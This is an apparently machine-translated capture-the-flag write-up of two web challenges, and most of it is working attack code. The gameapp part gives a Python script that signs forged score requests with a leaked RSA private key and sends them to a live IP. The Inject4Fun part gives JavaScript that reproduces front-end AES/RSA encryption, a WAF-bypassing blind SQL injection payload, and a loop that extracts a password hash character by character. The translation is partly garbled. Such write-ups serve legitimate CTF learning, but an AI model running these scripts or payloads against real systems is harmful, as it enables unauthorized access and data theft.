gameapp
This problem is first decompiled apk, simply looked at the code, there are mainly two startgame and score api, and then use the simulator (the phone is not on board) to install apk caught under the package, after rsa encrypted data, so the first with python achieve rsa (the private key can be found in the online search has been used, so direct someone else's script be changed with the change). 99999 get questions asked, but get a maximum of 100 points, so send 999 times 100 points, 99 points can be sent once.
1 import cPickle,M2Crypto,os,urllib,requests 2 BaseUrl="http://121.40.219.183:9999/" 3 sign_pri=''' 4 -----BEGIN RSA PRIVATE KEY----- 5 MIICXgIBAAKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMYImonQdMC1Y8USwIwf7Y0GcBP 6 /h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8aYFoms223okyzeTlUIRHbIkto 7 1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHEA3Hau/DTzW4g4xhvzQIDAQAB 8 AoGAVHWs7rAnT28ZHtPUCNzqulXrlnBIhx3JMejJfqfR8H7vff2TqcA4FEEr2QNx 9 U0Pj0tzqS9KrO1EpQ7FwXtheoAmf3tQb5BDxPxcph2820qa/AcIxHpf5LqfONs9d 10 UrozcR23s561yjX7w5akeRzOwrq2BKwVtF/EoXvJTQKlwV0CQQDY96T70hxUOLoJ 11 FrLelwl/4Heb0Lrz83lMB6UXknUbJgOiZr/KD9NzEM477MqzKD2rTM4TeULX6cNd 12 hXm35daXAkEAyWtkRrStowoiscynG1KfaT4ksbbHWr53iqAhv7Z3SAshn3k9TURk 13 kLCQhyIcXXnuEEGFlK84WxQSy2Q6uLI9OwJBAMpLdE+7IuDAF2z79gCmUJwjfUIR 14 hw6H95OVGS/2RSvv8LmOFcpfoSaLB89Fw+TxYzaBoS71BAbulVJwbgGx0bcCQQCs 15 rJxy4UJam73Sn5hDHDn9h4D9uax+ZvskpNNJ/6uS37gbd1zOeOud/0BoGR4oJPeq 16 iAF0ziKKMlNKesq8vFExAkEAsvLbn5avP/CEkXZB4sRDV/gD3mK+IY5p+ZlBSYAe 17 KhVKdUXkdJwNqBn+iJMwFhMC7xHIbijLRe3hL9ZB0vt1nQ== 18 -----END RSA PRIVATE KEY----- 19 ''' 20 def private_encrypt(data): 21 rsa_pri = M2Crypto.RSA.load_key_string(sign_pri) 22 ctxt_pri = rsa_pri.private_encrypt(data, M2Crypto.RSA.pkcs1_padding) 23 ctxt64_pri = ctxt_pri.encode('base64') 24 return ctxt64_pri 25 def public_decrypt(msg): 26 sign_pub=''' 27 -----BEGIN PUBLIC KEY----- 28 MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCqtXUIVoPUcBV1Wl3g8rGGNvMY 29 ImonQdMC1Y8USwIwf7Y0GcBP/h6fAJPAS9//qYZzy8ZfDKH1+ezifFFCUTCCa/8a 30 YFoms223okyzeTlUIRHbIkto1JxYOazbsE6+KmE+yJiij4839SYuC1KsLWT82uHE 31 A3Hau/DTzW4g4xhvzQIDAQAB 32 -----END PUBLIC KEY----- 33 ''' 34 bio = M2Crypto.BIO.MemoryBuffer(sign_pub) 35 rsa_pub = M2Crypto.RSA.load_pub_key_bio(bio) 36 ctxt_pri = msg.decode("base64") 37 output = rsa_pub.public_decrypt(ctxt_pri, M2Crypto.RSA.pkcs1_padding) 38 return output 39 40 data1 = '{"player" : "user"}' 41 a = requests.Session() 42 a.post(url=BaseUrl+"startgame/",data=private_encrypt(data1),headers={'Content-Type':'xxx'}) 43 for i in range(999): 44 r=a.post(url=BaseUrl+"score/",data=private_encrypt("""{"score":100,"op":"add"}"""),headers={'Content-Type':'xxx'}) 45 print r.text 46 r=a.post (url = BaseUrl + score /"",data=private_encrypt("""{"score":99,"op":"add"}"""),headers={'Content-Type':'xxx'}) 47 print r.text 48 49 r=a.get(url=BaseUrl,headers={'Content-Type':'xxx'}) 50 print r 51 print a
Inject4Fun
This question needs to be said, not much, just two summary
1. To achieve the front end encryption
1 var password = "admin"; 2 var username = "admin"; 3 var a = '1234567890abcdef'; 4 var key = CryptoJS.enc.Latin1.parse(a); 5 var iv = CryptoJS.enc.Latin1.parse('1234567890123456'); 6 var data1 = username; 7 var encrypted1 = CryptoJS.AES.encrypt(data1, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding }); 8 var data2 = password; 9 var encrypted2 = CryptoJS.AES.encrypt(data2, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding }); 10 var rsa = new RSAKey(); 11 var modulus = "CDB41B014C244A55CEC3E9D222B22C8A05A7DD7DF8A419A2A9C08E91DF725A1FD4C09777F36D394701C5DB97CCFC52FFBD5A90329295F5CEBBB89986BAAFAE4FE58A1F3ECFC39A7B960F5697632CE9D2FAA787F36D9CF5F4FE59DBB52E0554CC4B510D87AB72EB80D36A61E8B9AD00F37720578986E5F17AB0387754566F4E2B"; 12 var exponent = "010001"; 13 rsa.setPublic(modulus, exponent); 14 var res = rsa.encrypt(a); 15 var xhr = new XMLHttpRequest(); 16 xhr.open("POST","http://129.204.73.141:2000/login.php",false); 17 xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded"); 18 xhr.send("username="+encrypted1+"&password="+encrypted2+"&code="+res); 19 xhr.response 20 2.绕过waf 21 这里直接给出payload 22 23 var username = "admin'=(left(right(password,1),1)>'a')='1"; //返回wrong password 24 var username = "admin'=(left(right(password,1),1)<'a')='1";exp25return the User Wrong//
Do not know why, waf toxic this problem, it may trigger randomness, we can solve this problem by modifying the 16-bit key randomly generated
Because waf toxic problems, not the disposable 32-bit hash ran, many changes need to obtain a complete hash
1 var pass=''; 2 var s='1234567890abcdef'; 3 for(var n=1;n<33;n++) 4 { 5 for(var i in s) 6 { 7 var password = "admin"; 8 var username = "admin'=(left(right(password,"+n+"),1)='"+s[i]+"')='1"; 9 var a = '1234567890abceef'; 10 var key = CryptoJS.enc.Latin1.parse(a); 11 var iv = CryptoJS.enc.Latin1.parse('1234567890123456'); 12 var data1 = username; 13 var encrypted1 = CryptoJS.AES.encrypt(data1, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding }); 14 var data2 = password; 15 var encrypted2 = CryptoJS.AES.encrypt(data2, key, { iv: iv, mode: CryptoJS.mode.CBC, padding: CryptoJS.pad.ZeroPadding }); 16 var rsa = new RSAKey(); 17 var modulus = "CDB41B014C244A55CEC3E9D222B22C8A05A7DD7DF8A419A2A9C08E91DF725A1FD4C09777F36D394701C5DB97CCFC52FFBD5A90329295F5CEBBB89986BAAFAE4FE58A1F3ECFC39A7B960F5697632CE9D2FAA787F36D9CF5F4FE59DBB52E0554CC4B510D87AB72EB80D36A61E8B9AD00F37720578986E5F17AB0387754566F4E2B"; 18 var exponent = "010001"; 19 rsa.setPublic(modulus, exponent); 20 var res = rsa.encrypt(a); 21 var xhr = new XMLHttpRequest(); 22 xhr.open("POST","http://129.204.73.141:2000/login.php",false); 23 xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded"); 24 setTimeout(xhr.send("username="+encrypted1+"&password="+encrypted2+"&code="+res),1000); 25 if(xhr.response.search('wrong password')!=-1) 26 {pass+=s[i];console.log(s[i]+' '+n);break;} 27 } 28 }